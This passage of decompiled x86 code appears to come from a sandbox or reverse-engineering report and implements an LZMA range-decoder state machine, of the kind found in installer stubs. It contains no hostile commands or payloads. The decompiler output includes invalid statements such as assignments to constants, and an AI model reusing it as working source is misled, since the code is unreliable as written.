											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
